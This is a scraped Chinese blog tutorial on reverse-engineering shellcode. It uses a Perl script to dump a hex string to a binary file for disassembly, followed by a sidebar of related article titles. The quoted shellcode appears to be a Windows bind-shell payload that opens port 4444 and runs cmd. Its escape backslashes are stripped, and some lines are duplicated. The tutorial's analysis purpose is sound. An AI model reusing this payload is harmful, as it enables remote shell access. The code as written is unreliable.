如何逆向分析shellcode?
来源:互联网 发布:将svg转化成canvas js 编辑:程序博客网 时间:2024/05/22 12:36
原文地址:如何逆向分析shellcode?作者:小心
如何逆向分析shellcode?
经常可以看到一些精彩的shellcode,但又不知道它怎么来得,一堆16进制数字看的眼晕。这里有个方法:
首先用perl将这段shellcode写入一个二进制文件,然后利用反汇编工具进行反汇编,就可以看到shellcode对应汇编源码咯。呵呵
例如:
#!/usr/bin/perl
经常可以看到一些精彩的shellcode,但又不知道它怎么来得,一堆16进制数字看的眼晕。这里有个方法:
首先用perl将这段shellcode写入一个二进制文件,然后利用反汇编工具进行反汇编,就可以看到shellcode对应汇编源码咯。呵呵
例如:
#!/usr/bin/perl
$shellcode=
"xfcx6axebx4dxe8xf9xffxffxffx60x8bx6c".
"x24x24x8bx45x3cx8bx7cx05x78x01xefx8b".
"x4fx18x8bx5fx20x01xebx49x8bx34x8bx01".
"xeex31xc0x99xacx84xc0x74x07xc1xcax0d".
"x01xc2xebxf4x3bx54x24x28x75xe5x8bx5f".
"x24x01xebx66x8bx0cx4bx8bx5fx1cx01xeb".
"x03x2cx8bx89x6cx24x1cx61xc3x31xdbx64".
"x8bx43x30x8bx40x0cx8bx70x1cxadx8bx40".
"x08x5ex68x8ex4ex0execx50xffxd6x66x53".
"x66x68x33x32x68x77x73x32x5fx54xffxd0".
"x68xcbxedxfcx3bx50xffxd6x5fx89xe5x66".
"x81xedx08x02x55x6ax02xffxd0x68xd9x09".
"xf5xadx57xffxd6x53x53x53x53x53x43x53".
"x43x53xffxd0x66x68x11x5cx66x53x89xe1".
"x95x68xa4x1ax70xc7x57xffxd6x6ax10x51".
"x55xffxd0x68xa4xadx2exe9x57xffxd6x53".
"x55xffxd0x68xe5x49x86x49x57xffxd6x50".
"x54x54x55xffxd0x93x68xe7x79xc6x79x57".
"xffxd6x55xffxd0x66x6ax64x66x68x63x6d".
"x89xe5x6ax50x59x29xccx89xe7x6ax44x89".
"xe2x31xc0xf3xaaxfex42x2dxfex42x2cx93".
"x8dx7ax38xabxabxabx68x72xfexb3x16xff".
"x75x44xffxd6x5bx57x52x51x51x51x6ax01".
"x51x51x55x51xffxd0x68xadxd9x05xcex53".
"xffxd6x6axffxffx37xffxd0x8bx57xfcx83".
"xc4x64xffxd6x52xffxd0x68x7exd8xe2x73".
"x53xffxd6xffxd0";
open(FILE,">shellcode.bin");
print FILE "$shellcode";
close(FILE);
open(FILE,">shellcode.bin");
print FILE "$shellcode";
close(FILE);
然后利用反编译工具,比如nasm下的ndisasm,或者W32Dasm之类的反编译shellcode.bin,就可以看到对应汇编源码,从而学习人家的shellcode喔!呵呵
阅读全文
0 0
- 如何逆向分析shellcode?
- 171224 逆向-EvilExe的Shellcode分析
- 如何把shellcode转换成exe文件分析
- 缓冲区溢出-shellcode分析
- Android安全:如何逆向分析Android程序
- 如何编写本地shellcode
- 如何生成stage shellcode
- 如何编写一个shellcode
- 逆向分析
- 逆向分析
- 【分析】通用ShellCode深入剖析
- Shellcode的分析调试技巧
- 一个shellcode的细致分析
- 简单Shellcode的详细分析
- 如何编写绑定端口shellcode
- 如何编写绑定端口shellcode
- shellcode
- Shellcode
- doT模板引擎源码分析
- Java泛型使用(一)
- 利用谷歌语法查找网站后台和…
- 使用butterknife应该注意的问题
- 基于微服务架构的技术实践(附PPT)
- 如何逆向分析shellcode?
- iOS UItableviewCell 自定义选中颜色及默认选中首行
- navicat注册码
- 汇编自学 (15) 补码 jmp
- linux基本命令--文件查看命令
- C++中关于二维数组作为函数…
- od 快捷键手动整理
- input鼠标点击提示消失,鼠标点出提示出现
- C/C++定义全局变量/常量几种方法的…